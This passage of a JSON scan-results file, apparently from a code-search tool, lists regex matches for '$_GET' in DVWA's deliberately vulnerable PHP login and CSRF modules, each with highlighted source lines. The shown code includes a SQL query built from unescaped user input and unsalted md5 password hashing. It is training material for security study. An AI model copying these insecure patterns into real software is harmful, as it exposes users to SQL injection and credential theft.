operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 79,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get username\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 82,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 83,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 84,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 142,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 143,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 144,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 150,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 151,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span 